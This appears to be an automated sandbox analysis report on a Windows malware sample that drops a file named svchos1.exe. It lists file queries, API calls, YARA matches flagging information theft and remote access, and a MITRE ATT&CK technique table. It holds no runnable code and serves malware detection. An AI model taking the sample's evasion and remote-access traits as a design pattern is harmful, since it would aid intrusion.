          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007B4EBA GetSystemTimeAsFileTime,__aulldiv,28_2_007B4EBA
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035DC690 strrchr,strrchr,strrchr,strncpy,GetUserNameA,_strcmpi,sprintf,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,strstr,strstr,strstr,lstrcat,lstrcat,lstrcat,lstrcpy,_strcmpi,_strcmpi,_strcmpi,_strcmpi,_strcmpi,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,28_2_035DC690
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007BD290 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,28_2_007BD290
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006C7777 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyW,lstrcpyW,EnumFontFamiliesW,EnumFontFamiliesW,lstrcpyW,EnumFontFamiliesW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,GetSystemMetrics,lstrcpyW,CreateFontIndirectW,GetStockObject,GetStockObject,GetObjectW,GetObjectW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,GetStockObject,GetObjectW,CreateFontIndirectW,CreateFontIndirectW,__EH_prolog3_GS,GetVersionExW,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,28_2_006C7777
          Source: C:\Users\user\Desktop\SystemProcess18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: svchos1.exeBinary or memory string: 360Tray.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001D.00000002.3732839256.000000000316B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.3734597891.000000000356C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.3734864842.00000000036AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.3732199510.0000000002A6C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E4150 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,28_2_035E4150
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E3D90 socket,bind,getsockname,inet_addr,28_2_035E3D90
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030A4150 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,29_2_030A4150
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030A3D90 socket,bind,getsockname,inet_addr,29_2_030A3D90
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Replication Through Removable Media
          11
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          11
          Disable or Modify Tools
          21
          Input Capture
          2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter
          11
          Windows Service
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory11
          Peripheral Device Discovery
          Remote Desktop Protocol1
          Screen Capture
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Scheduled Task/Job
          1
          Scheduled Task/Job
          1
          Access Token Manipulation
          3
          Obfuscated Files or Information
          Security Account Manager1
          Account Discovery
          SMB/Windows Admin Shares21
          Input Capture
          1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts12
          Service Execution
          Login Hook11
          Windows Service
          1
          DLL Side-Loading
